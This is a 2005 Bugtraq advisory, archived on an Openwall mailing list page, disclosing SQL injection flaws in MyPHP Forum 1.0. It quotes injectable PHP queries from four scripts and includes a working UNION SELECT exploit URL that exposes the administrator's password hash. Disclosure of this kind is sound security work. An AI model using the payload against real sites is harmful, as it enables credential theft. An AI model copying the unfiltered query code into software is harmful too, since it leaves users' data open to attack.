lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050209081714.15780.qmail@www.securityfocus.com>
Date: 9 Feb 2005 08:17:14 -0000
From: foster GHC <foster@....ru>
To: bugtraq@...urityfocus.com
Subject: Several SQL injection bugs in myPHP Forum v.1.0




/*==========================================*/
// GHC -> MyPHP Forum <- ADVISORY
// Product: MyPHP Forum
// Version: 1.0
// URL: http://www.myphp.ws
// VULNERABILITY CLASS: SQL injection
/*==========================================*/

[Product Description]
MyPHP Forum is a simple message board script with limited features.

[Summary]
Several SQL Injection vulnerabilities may lead to viewing of sensetive information,
including hash of user's password.

[Details]
Positive part of user outbound variables used as they are in SQL queries.

[1] script name: forum.php

---[code]---
$query = mysql_query("SELECT fid, name FROM $db_forum WHERE fid='$fid'") or die(mysql_error());
$nav = mysql_fetch_array($query);
---[/code]---

Possible SQL injection through $fid variable that has no filtration.

[2] script name: member.php

---[code]---
if($action == "viewpro") {
        $member = $HTTP_GET_VARS['member'];
        $sql =  "SELECT * FROM $db_member WHERE username='$member'";
        $query = mysql_query("SELECT * FROM $db_member WHERE username='$member'") or die("cant execute $sql");
        $member = mysql_fetch_array($query);
---[/code]---

SQL code injection 
member.php?action=viewpro&member=[SQL code]

[example of exploit]
member.php?action=viewpro&member=nonexist' UNION SELECT uid, username, password, status, email, website, aim, msn, location, sig, regdate, posts, password as yahoo FROM nb_member WHERE uid='1
will show administrator's name and password hash (in the "Yahoo" field).  

Password cripted by encrypt() function:
-[code]-
function encrypt($string) {
    $crypted = crypt(md5($string), md5($string));
    return $crypted;
}
-[/code]-

[3] script name: forgot.php

---[code]---
$email = $_REQUEST['email'];
        if (isset($email)) {
        $sql="SELECT * FROM $db_member WHERE email='$email'";  
...
$result = mysql_query("SELECT username FROM $db_member WHERE email='$email'");
                        $username = mysql_result($result, 0);
                        $msg = "
                        Hello $username,
---[code]---
$email variable has no filtration. 
IMPACT: Possible SQL injection through this variable.

[4] script name: include.php
This is the most important script that is the part of all others.
$nbuser & $nbpass variables are not filtering. 

---[code]---
$query = mysql_query("SELECT * FROM $db_member WHERE username='$nbuser'")
---[/code]---
IMPACT: possible SQL injection through $nbuser.

P.S. all bugs are actual for magic_quotes_gpc=0.

/* ================================================== */
/* www.ghc.ru -- security games & challenges          */
/* ================================================== */
/* greets to: RST.void.ru, D0G4 & all quest hunters %)*/
/* ================================================== */



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ